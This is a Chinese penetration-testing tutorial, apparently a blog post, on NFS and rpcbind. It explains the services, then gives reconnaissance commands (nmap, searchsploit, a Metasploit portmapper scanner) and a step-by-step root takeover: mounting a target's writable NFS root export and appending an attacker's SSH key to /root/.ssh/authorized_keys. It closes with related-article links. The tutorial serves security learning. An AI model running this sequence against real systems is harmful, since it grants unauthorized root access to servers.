1、相关服务介绍

1.1 NFS

NFS(network file system)：网络文件系统。Linux下三大文件系统之一，采用C/S架构。允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS应用中，本地NFS客户端可以透明的读写位于远端NFS服务器上的文件。

NFS服务端机器：通过NFS协议将文件共享到网络上

NFS客户端机器：通过网络挂载NFS共享目录到本地

补充：NFS服务器主要进程

1 rpc.nfsd 进程
NFS 服务的主进程，主要管理客户端是否能够接入 NFS 服务器以及数据的传输。

该进程固定监听 TCP/UDP 2049 端口。

2 rpc.mountd 进程
管理和维护 NFS 文件系统，根据所设定的权限决定是否允许客户端挂载指定的共享目录。

该进程监听的端口默认是不固定的。

3 rpc.lockd 进程
提供文件锁功能，防止多个客户端同时写入一个文件。

该进程监听的端口默认是不固定的。

4 rpc.statd 进程
负责检查数据的状态及一致性，需要与 rpc.lockd 配合使用。

该进程监听的端口默认是不固定的。

5 rpcbind 进程
RPC 的端口映射器进程，监听 UDP 111 端口。

更多参考：

NFS详解（概念+实验演示）_Eichi_的博客-CSDN博客_nfs

1.2 RPC服务

RPC（Remote Procedure Call）：远程过程调用协议。

NFS 只提供了基本的文件处理功能，而不提供任何 TCP/IP 数据传输功能。它需要借助 RPC 协议才能实现 TCP/IP 数据传输功能。

RPC 最主要的功能就是在指定每个 NFS 功能所对应的端口序号（port number ），并且回报给客户端，让客户端可以连结到正确的物理端口（port）上去。

本文实验即通过此探测此服务，获取NFS相关服务信息。

补充：shodan搜索发现，全球开启111端口的服务器约210万

2、探测目标rpcbind

2.1 探测版本信息

nmap -sV -p 111 192.168.x.xx//探测rpcbind版本信息

searchsploit rpcbind//搜索相关漏洞

2.2 nmap脚本探测

nmap -p 111 --script=rpcinfo 192.168.x.xx//探测目标的rpcinfo信息

2.3 使用metasploit模块验证

use auxiliary/scanner/misc/sunrpc_portmapper//SunRPC Portmap程序枚举器
//此模块调用目标端口映射服务并枚举所有程序条目及其运行端口号。

show info//查看模块信息

3、Linux NFS共享目录配置漏洞

原理： NFS服务配置漏洞赋予了根目录远程可写权限，导致/root/.ssh/authorized_keys 可被修改，实现远程ssh无密码登录

showmount -e IP//showmount（show mounted disk），其功能是用于显示NFS服务器的共享信息。
//-d 仅显示已被NFS客户端加载的目录
//-e 显示NFS服务器上所有的共享目录

ssh-keygen //生成RSA公钥

cd /tmp
mkdir troot（名字随意）mount –t nfs IP:/ /tmp/troot
//把192.168.92.9的根目录挂载到/tmp/troot/下cat /root/.ssh/id_rsa.pub>>/tmp/troot/root/.ssh/authorized_keys
//把生成的公钥追加到靶机的authorized_keys

ssh root@IP//实现无密码登录

4.8、漏洞利用-NSF配置漏洞与Rpcbind信息泄露相关推荐

服务器信息泄漏漏洞,Windows2008 r2“Web服务器HTTP头信息泄露”漏洞修复(示例代码)...
一.漏洞名称漏洞名称漏洞摘要修复建议 Web服务器HTTP头信息泄露远程Web服务器通过HTTP头公开信息.修改Web服务器的HTTP头以不公开有关底层Web服务器的详细信息. 二.安装IIS 6 管 ...
漏洞通告 | Microsoft MSDT 路径便利漏洞；Owl labs Meeting Owl Pro信息泄露漏洞
[Microsoft MSDT路径便利漏洞] 漏洞详情 MSDT(Microsoft Support Diagnostics Tool,微软支持诊断工具)是一种实用程序,用于排除故障并收集诊断数据以供 ...
linux 路由器漏洞,多个Linksys EA系列路由器信息泄露漏洞(CVE-2014-8244)
发布日期:2014-10-31 更新日期:2014-11-04 受影响系统: Linksys EA系列路由器 EA6900 Linksys EA系列路由器 EA6700 Linksys EA系列路由器 ...
Hack The Box - Catch 利用let chat API查询信息，Cachet配置泄露漏洞获取ssh登录密码，apk代码注入漏洞利用获取root权限
Hack The Box-Catch Hack The Box开始使用流程看这篇文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...
010106漏洞利用
6-1漏洞利用-FTP漏洞利用 1. FTP协议介绍文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式.它 ...
Chrome 0 day漏洞利用链
远程代码执行漏洞利用所有的攻击活动都是通过Chrome浏览器执行的.虽然研究人员无法获取漏洞利用的JS代码,但是研究人员根据相关攻击活动的时间轴推测出了利用的漏洞--CVE-2021-21224.此 ...
经验分享 | 通过adbd配置漏洞在安卓设备上提升权限
近日,Android上的一个本地提权漏洞已被确认,该漏洞可通过设备上运行的Android Debug Bridge Daemon(adbd)被利用. 如果一个安卓设备被发现正在运行于TCP端口监听的a ...
android4 设置栈大小,【技术分享】Android内核漏洞利用技术实战：环境搭建栈溢出实战...
[技术分享]Android内核漏洞利用技术实战:环境搭建&栈溢出实战 2017-08-14 16:22:02 阅读:0次预估稿费:300RMB 投稿方式:发送邮件至linwei#360.cn ...
Kali Linux 秘籍第六章漏洞利用
第六章漏洞利用作者:Willie L. Pritchett, David De Smet 译者:飞龙协议:CC BY-NC-SA 4.0 简介一旦我们完成了漏洞扫描步骤,我们就了解了必要的知识 ...
渗透测试漏洞利用入门总结
渗透测试漏洞利用入门总结漏洞利用利用medusa获得远程服务的访问权限. 这些服务包括ssh.telnet.ftp.pc anywhere .vnc 对这些服务进行爆破的工具分别是medusa 和 ...

4.8、漏洞利用-NSF配置漏洞与Rpcbind信息泄露

1、相关服务介绍

1.1 NFS

1.2 RPC服务

2、探测目标rpcbind

2.1 探测版本信息

2.2 nmap脚本探测

2.3 使用metasploit模块验证

3、Linux NFS共享目录配置漏洞

4.8、漏洞利用-NSF配置漏洞与Rpcbind信息泄露相关推荐

最新文章

热门文章